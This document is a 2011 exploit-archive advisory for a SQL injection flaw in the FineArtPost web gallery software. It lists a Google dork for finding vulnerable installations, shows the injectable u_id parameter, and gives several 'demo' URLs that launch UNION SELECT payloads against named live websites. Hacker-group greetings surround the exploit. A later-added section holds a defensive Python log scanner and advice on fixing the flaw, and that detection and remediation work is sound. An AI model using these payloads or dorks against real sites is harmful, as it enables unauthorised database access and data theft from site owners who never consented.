FineArtPost <= SQL Injection Vulnerability



EKU-ID: 350 CVE: OSVDB-ID:
Author: Caddy-Dz Published: 2011-05-30 Verified: Not Verified


=================================================================================
                      .__         .__  __            .__    .___

  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ |
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |

\___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
     \/      \/|__|                                          \/

Exploit-ID is the Indonesian Exploit Archive

Web             : exploit-id.com

e-mail          : root[at]exploit-id.com              

                      #########################################
                       I'm Caddy-Dz ,  member from exploit-id.com

                      #########################################  
================================================================================
####
# Exploit Title: FineArtPost <= SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com  |  Caddy-Dz@exploit-id.com
# Category: webapps
# Google Dork: intext:"powered by FineArtPost" inurl:u_id
# Tested on: [Windows Vista Edition Intégrale]
####

||> Special Greeting To: KedAns-Dz & All Algerians Hackers

####


[*] ## ExPLo!T:

http://127.0.0.1/[Path]/*.php?user_id=2&u_id=44&user_id=2&large=yes   /  ==> /  http://127.0.0.1/*.php?user_id=2&u_id=44[Inject Here]

http://127.0.0.1/*.php?user_id=2&u_id=[SQLI]

http://127.0.0.1/[Path]/*.php?user_id=2&u_id=[SQLI]


####


[*]## Demo:

http://www.artisanwoodsgallery.com/public/display_images.php?user_id=2&u_id=-44%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--

http://www.fineartpost.com/zaluchapost/public/display_images.php?u_id=-193%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--

http://www.mcaseyart.com/public/view_text.php?t_id=7&u_id=-36%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--

####
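
Added example, not part of the original advisory: a defender-side log check for the pattern shown above. It assumes combined-format access logs and that u_id, user_id and t_id are always plain integers in legitimate traffic; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Numeric identifier parameters that appear in the advisory's URLs.
ID_PARAMS = {"u_id", "user_id", "t_id"}
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate IDs are short runs of ASCII digits only.
PLAIN_INT = re.compile(r"[0-9]{1,10}")


def suspicious_params(log_line):
    """Return [(param, decoded_value)] for ID parameters that are not plain integers."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group(1)).query
    hits = []
    # parse_qsl URL-decodes values and keeps repeated parameters, so a
    # clean first u_id cannot hide a tampered second one.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in ID_PARAMS and not PLAIN_INT.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(lines):
    """Yield (client_ip, hits) for each log line with at least one hit."""
    for line in lines:
        hits = suspicious_params(line)
        if hits:
            yield line.split(" ", 1)[0], hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/May/2011:10:00:01 +0000] "GET /public/display_images.php?user_id=2&u_id=44&large=yes HTTP/1.1" 200 5120',
    '192.0.2.77 - - [30/May/2011:10:00:09 +0000] "GET /public/display_images.php?user_id=2&u_id=-44%20union%20select%201,2,version()-- HTTP/1.1" 200 812',
    '192.0.2.77 - - [30/May/2011:10:00:15 +0000] "GET /public/view_text.php?t_id=7&u_id=36&u_id=36%27 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, hits)
```

The same integer-only rule belongs in the application itself: cast or validate the ID before it reaches the database and bind it as a query parameter rather than concatenating it into the SQL string.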

Peace From Algeria

####

||> Exploit-id will not die

=================================**Algerians Hackers**=======================================
# Greets To :
  KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team ,  (exploit-id.com)
  (1337day.com) , (09exploit.com) , All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer ,
   MaaTar , St0fa , Nissou , RmZ ...others
============================================================================================